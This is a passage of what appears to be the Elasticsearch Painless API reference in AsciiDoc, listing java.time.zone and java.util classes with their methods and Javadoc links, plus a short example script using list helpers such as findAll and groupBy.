{java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransitionRule$TimeDefinition.html#valueOf(java.lang.String)[valueOf](null) -* static ZoneOffsetTransitionRule.TimeDefinition[] {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransitionRule$TimeDefinition.html#values()[values]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#compareTo(java.lang.Enum)[compareTo](Enum) -* LocalDateTime {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransitionRule$TimeDefinition.html#createDateTime(java.time.LocalDateTime,java.time.ZoneOffset,java.time.ZoneOffset)[createDateTime](LocalDateTime, ZoneOffset, ZoneOffset) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Enum.html#name()[name]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#ordinal()[ordinal]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ZoneRules]] -==== ZoneRules -* static ZoneRules {java11-javadoc}/java.base/java/time/zone/ZoneRules.html#of(java.time.ZoneOffset)[of](ZoneOffset) -* static ZoneRules {java11-javadoc}/java.base/java/time/zone/ZoneRules.html#of(java.time.ZoneOffset,java.time.ZoneOffset,java.util.List,java.util.List,java.util.List)[of](ZoneOffset, ZoneOffset, List, List, List) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* Duration {java11-javadoc}/java.base/java/time/zone/ZoneRules.html#getDaylightSavings(java.time.Instant)[getDaylightSavings](Instant) -* ZoneOffset {java11-javadoc}/java.base/java/time/zone/ZoneRules.html#getOffset(java.time.Instant)[getOffset](Instant) -* ZoneOffset {java11-javadoc}/java.base/java/time/zone/ZoneRules.html#getStandardOffset(java.time.Instant)[getStandardOffset](Instant) -* ZoneOffsetTransition {java11-javadoc}/java.base/java/time/zone/ZoneRules.html#getTransition(java.time.LocalDateTime)[getTransition](LocalDateTime) -* List {java11-javadoc}/java.base/java/time/zone/ZoneRules.html#getTransitionRules()[getTransitionRules]() -* List {java11-javadoc}/java.base/java/time/zone/ZoneRules.html#getTransitions()[getTransitions]() -* List {java11-javadoc}/java.base/java/time/zone/ZoneRules.html#getValidOffsets(java.time.LocalDateTime)[getValidOffsets](LocalDateTime) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean 
{java11-javadoc}/java.base/java/time/zone/ZoneRules.html#isDaylightSavings(java.time.Instant)[isDaylightSavings](Instant) -* boolean {java11-javadoc}/java.base/java/time/zone/ZoneRules.html#isFixedOffset()[isFixedOffset]() -* boolean {java11-javadoc}/java.base/java/time/zone/ZoneRules.html#isValidOffset(java.time.LocalDateTime,java.time.ZoneOffset)[isValidOffset](LocalDateTime, ZoneOffset) -* ZoneOffsetTransition {java11-javadoc}/java.base/java/time/zone/ZoneRules.html#nextTransition(java.time.Instant)[nextTransition](Instant) -* ZoneOffsetTransition {java11-javadoc}/java.base/java/time/zone/ZoneRules.html#previousTransition(java.time.Instant)[previousTransition](Instant) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ZoneRulesException]] -==== ZoneRulesException -* {java11-javadoc}/java.base/java/time/zone/ZoneRulesException.html#(java.lang.String)[ZoneRulesException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ZoneRulesProvider]] -==== ZoneRulesProvider -* static Set {java11-javadoc}/java.base/java/time/zone/ZoneRulesProvider.html#getAvailableZoneIds()[getAvailableZoneIds]() -* static ZoneRules {java11-javadoc}/java.base/java/time/zone/ZoneRulesProvider.html#getRules(java.lang.String,boolean)[getRules](null, boolean) -* static NavigableMap {java11-javadoc}/java.base/java/time/zone/ZoneRulesProvider.html#getVersions(java.lang.String)[getVersions](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[role="exclude",id="painless-api-reference-shared-java-util"] -=== Shared API for package java.util -See the <> for a high-level overview of all packages and classes. 
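Alongside the JDK methods, the collection listings below include Painless-specific augmentations such as `findAll`, `collect`, `groupBy`, and `sum`. A minimal sketch of how they read in a script; the values are arbitrary:

[source,painless]
----
// Minimal sketch: JDK List methods mixed with the Painless augmentations
// (findAll, collect, groupBy, sum) shown in the listings below.
List prices = new ArrayList();
prices.add(10.5);
prices.add(3.0);
prices.add(27.25);
List expensive = prices.findAll(p -> p > 5.0);               // [10.5, 27.25]
List labels = prices.collect(p -> 'price:' + p);             // one label per element
Map buckets = prices.groupBy(p -> p > 5.0 ? 'high' : 'low'); // {high=[...], low=[...]}
double total = prices.sum();                                 // 40.75
----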
- -[[painless-api-reference-shared-AbstractCollection]] -==== AbstractCollection -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-AbstractList]] -==== AbstractList -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* void {java11-javadoc}/java.base/java/util/List.html#add(int,java.lang.Object)[add](int, def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/List.html#addAll(int,java.util.Collection)[addAll](int, Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/util/List.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* 
def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* def {java11-javadoc}/java.base/java/util/List.html#get(int)[get](int) -* Object getByPath(null) -* Object getByPath(null, Object) -* int getLength() -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/util/List.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/util/List.html#indexOf(java.lang.Object)[indexOf](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* int {java11-javadoc}/java.base/java/util/List.html#lastIndexOf(java.lang.Object)[lastIndexOf](def) -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator()[listIterator]() -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator(int)[listIterator](int) -* def {java11-javadoc}/java.base/java/util/List.html#remove(int)[remove](int) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* void {java11-javadoc}/java.base/java/util/List.html#replaceAll(java.util.function.UnaryOperator)[replaceAll](UnaryOperator) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* def {java11-javadoc}/java.base/java/util/List.html#set(int,java.lang.Object)[set](int, def) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* void {java11-javadoc}/java.base/java/util/List.html#sort(java.util.Comparator)[sort](Comparator) -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* List {java11-javadoc}/java.base/java/util/List.html#subList(int,int)[subList](int, int) -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-AbstractMap]] -==== AbstractMap -* void {java11-javadoc}/java.base/java/util/Map.html#clear()[clear]() -* List collect(BiFunction) -* def collect(Collection, BiFunction) -* def {java11-javadoc}/java.base/java/util/Map.html#compute(java.lang.Object,java.util.function.BiFunction)[compute](def, BiFunction) -* def {java11-javadoc}/java.base/java/util/Map.html#computeIfAbsent(java.lang.Object,java.util.function.Function)[computeIfAbsent](def, Function) -* def {java11-javadoc}/java.base/java/util/Map.html#computeIfPresent(java.lang.Object,java.util.function.BiFunction)[computeIfPresent](def, BiFunction) -* boolean {java11-javadoc}/java.base/java/util/Map.html#containsKey(java.lang.Object)[containsKey](def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#containsValue(java.lang.Object)[containsValue](def) -* int count(BiPredicate) -* def each(BiConsumer) -* Set {java11-javadoc}/java.base/java/util/Map.html#entrySet()[entrySet]() -* boolean 
{java11-javadoc}/java.base/java/util/Map.html#equals(java.lang.Object)[equals](Object) -* boolean every(BiPredicate) -* Map.Entry find(BiPredicate) -* Map findAll(BiPredicate) -* def findResult(BiFunction) -* def findResult(def, BiFunction) -* List findResults(BiFunction) -* void {java11-javadoc}/java.base/java/util/Map.html#forEach(java.util.function.BiConsumer)[forEach](BiConsumer) -* def {java11-javadoc}/java.base/java/util/Map.html#get(java.lang.Object)[get](def) -* Object getByPath(null) -* Object getByPath(null, Object) -* def {java11-javadoc}/java.base/java/util/Map.html#getOrDefault(java.lang.Object,java.lang.Object)[getOrDefault](def, def) -* Map groupBy(BiFunction) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/Map.html#isEmpty()[isEmpty]() -* Set {java11-javadoc}/java.base/java/util/Map.html#keySet()[keySet]() -* def {java11-javadoc}/java.base/java/util/Map.html#merge(java.lang.Object,java.lang.Object,java.util.function.BiFunction)[merge](def, def, BiFunction) -* def {java11-javadoc}/java.base/java/util/Map.html#put(java.lang.Object,java.lang.Object)[put](def, def) -* void {java11-javadoc}/java.base/java/util/Map.html#putAll(java.util.Map)[putAll](Map) -* def {java11-javadoc}/java.base/java/util/Map.html#putIfAbsent(java.lang.Object,java.lang.Object)[putIfAbsent](def, def) -* def {java11-javadoc}/java.base/java/util/Map.html#remove(java.lang.Object)[remove](def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#remove(java.lang.Object,java.lang.Object)[remove](def, def) -* def {java11-javadoc}/java.base/java/util/Map.html#replace(java.lang.Object,java.lang.Object)[replace](def, def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#replace(java.lang.Object,java.lang.Object,java.lang.Object)[replace](def, def, def) -* void {java11-javadoc}/java.base/java/util/Map.html#replaceAll(java.util.function.BiFunction)[replaceAll](BiFunction) -* int {java11-javadoc}/java.base/java/util/Map.html#size()[size]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* Collection {java11-javadoc}/java.base/java/util/Map.html#values()[values]() - - -[[painless-api-reference-shared-AbstractMap-SimpleEntry]] -==== AbstractMap.SimpleEntry -* {java11-javadoc}/java.base/java/util/AbstractMap$SimpleEntry.html#(java.util.Map$Entry)[AbstractMap.SimpleEntry](Map.Entry) -* {java11-javadoc}/java.base/java/util/AbstractMap$SimpleEntry.html#(java.lang.Object,java.lang.Object)[AbstractMap.SimpleEntry](def, def) -* boolean {java11-javadoc}/java.base/java/util/Map$Entry.html#equals(java.lang.Object)[equals](Object) -* def {java11-javadoc}/java.base/java/util/Map$Entry.html#getKey()[getKey]() -* def {java11-javadoc}/java.base/java/util/Map$Entry.html#getValue()[getValue]() -* int {java11-javadoc}/java.base/java/util/Map$Entry.html#hashCode()[hashCode]() -* def {java11-javadoc}/java.base/java/util/Map$Entry.html#setValue(java.lang.Object)[setValue](def) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-AbstractMap-SimpleImmutableEntry]] -==== AbstractMap.SimpleImmutableEntry -* {java11-javadoc}/java.base/java/util/AbstractMap$SimpleImmutableEntry.html#(java.util.Map$Entry)[AbstractMap.SimpleImmutableEntry](Map.Entry) -* {java11-javadoc}/java.base/java/util/AbstractMap$SimpleImmutableEntry.html#(java.lang.Object,java.lang.Object)[AbstractMap.SimpleImmutableEntry](def, def) -* boolean 
{java11-javadoc}/java.base/java/util/Map$Entry.html#equals(java.lang.Object)[equals](Object) -* def {java11-javadoc}/java.base/java/util/Map$Entry.html#getKey()[getKey]() -* def {java11-javadoc}/java.base/java/util/Map$Entry.html#getValue()[getValue]() -* int {java11-javadoc}/java.base/java/util/Map$Entry.html#hashCode()[hashCode]() -* def {java11-javadoc}/java.base/java/util/Map$Entry.html#setValue(java.lang.Object)[setValue](def) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-AbstractQueue]] -==== AbstractQueue -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* def {java11-javadoc}/java.base/java/util/Queue.html#element()[element]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* boolean {java11-javadoc}/java.base/java/util/Queue.html#offer(java.lang.Object)[offer](def) -* def {java11-javadoc}/java.base/java/util/Queue.html#peek()[peek]() -* def {java11-javadoc}/java.base/java/util/Queue.html#poll()[poll]() -* def {java11-javadoc}/java.base/java/util/Queue.html#remove()[remove]() -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-AbstractSequentialList]] -==== AbstractSequentialList -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* void 
{java11-javadoc}/java.base/java/util/List.html#add(int,java.lang.Object)[add](int, def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/List.html#addAll(int,java.util.Collection)[addAll](int, Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/util/List.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* def {java11-javadoc}/java.base/java/util/List.html#get(int)[get](int) -* Object getByPath(null) -* Object getByPath(null, Object) -* int getLength() -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/util/List.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/util/List.html#indexOf(java.lang.Object)[indexOf](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* int {java11-javadoc}/java.base/java/util/List.html#lastIndexOf(java.lang.Object)[lastIndexOf](def) -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator()[listIterator]() -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator(int)[listIterator](int) -* def {java11-javadoc}/java.base/java/util/List.html#remove(int)[remove](int) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* void {java11-javadoc}/java.base/java/util/List.html#replaceAll(java.util.function.UnaryOperator)[replaceAll](UnaryOperator) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* def {java11-javadoc}/java.base/java/util/List.html#set(int,java.lang.Object)[set](int, def) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* void {java11-javadoc}/java.base/java/util/List.html#sort(java.util.Comparator)[sort](Comparator) -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* List {java11-javadoc}/java.base/java/util/List.html#subList(int,int)[subList](int, int) -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-AbstractSet]] -==== 
AbstractSet -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/util/Set.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/util/Set.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* boolean {java11-javadoc}/java.base/java/util/Set.html#remove(java.lang.Object)[remove](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ArrayDeque]] -==== ArrayDeque -* {java11-javadoc}/java.base/java/util/ArrayDeque.html#()[ArrayDeque]() -* {java11-javadoc}/java.base/java/util/ArrayDeque.html#(java.util.Collection)[ArrayDeque](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* void {java11-javadoc}/java.base/java/util/Deque.html#addFirst(java.lang.Object)[addFirst](def) -* void {java11-javadoc}/java.base/java/util/Deque.html#addLast(java.lang.Object)[addLast](def) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* ArrayDeque {java11-javadoc}/java.base/java/util/ArrayDeque.html#clone()[clone]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean 
{java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* Iterator {java11-javadoc}/java.base/java/util/Deque.html#descendingIterator()[descendingIterator]() -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* def {java11-javadoc}/java.base/java/util/Queue.html#element()[element]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* def {java11-javadoc}/java.base/java/util/Deque.html#getFirst()[getFirst]() -* def {java11-javadoc}/java.base/java/util/Deque.html#getLast()[getLast]() -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* boolean {java11-javadoc}/java.base/java/util/Queue.html#offer(java.lang.Object)[offer](def) -* boolean {java11-javadoc}/java.base/java/util/Deque.html#offerFirst(java.lang.Object)[offerFirst](def) -* boolean {java11-javadoc}/java.base/java/util/Deque.html#offerLast(java.lang.Object)[offerLast](def) -* def {java11-javadoc}/java.base/java/util/Queue.html#peek()[peek]() -* def {java11-javadoc}/java.base/java/util/Deque.html#peekFirst()[peekFirst]() -* def {java11-javadoc}/java.base/java/util/Deque.html#peekLast()[peekLast]() -* def {java11-javadoc}/java.base/java/util/Queue.html#poll()[poll]() -* def {java11-javadoc}/java.base/java/util/Deque.html#pollFirst()[pollFirst]() -* def {java11-javadoc}/java.base/java/util/Deque.html#pollLast()[pollLast]() -* def {java11-javadoc}/java.base/java/util/Deque.html#pop()[pop]() -* void {java11-javadoc}/java.base/java/util/Deque.html#push(java.lang.Object)[push](def) -* def {java11-javadoc}/java.base/java/util/Queue.html#remove()[remove]() -* boolean {java11-javadoc}/java.base/java/util/Deque.html#remove(java.lang.Object)[remove](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* def {java11-javadoc}/java.base/java/util/Deque.html#removeFirst()[removeFirst]() -* boolean {java11-javadoc}/java.base/java/util/Deque.html#removeFirstOccurrence(java.lang.Object)[removeFirstOccurrence](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* def {java11-javadoc}/java.base/java/util/Deque.html#removeLast()[removeLast]() -* boolean {java11-javadoc}/java.base/java/util/Deque.html#removeLastOccurrence(java.lang.Object)[removeLastOccurrence](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] 
{java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ArrayList]] -==== ArrayList -* {java11-javadoc}/java.base/java/util/ArrayList.html#()[ArrayList]() -* {java11-javadoc}/java.base/java/util/ArrayList.html#(java.util.Collection)[ArrayList](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* void {java11-javadoc}/java.base/java/util/List.html#add(int,java.lang.Object)[add](int, def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/List.html#addAll(int,java.util.Collection)[addAll](int, Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* def {java11-javadoc}/java.base/java/util/ArrayList.html#clone()[clone]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/util/List.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* def {java11-javadoc}/java.base/java/util/List.html#get(int)[get](int) -* Object getByPath(null) -* Object getByPath(null, Object) -* int getLength() -* Map groupBy(Function) -* int 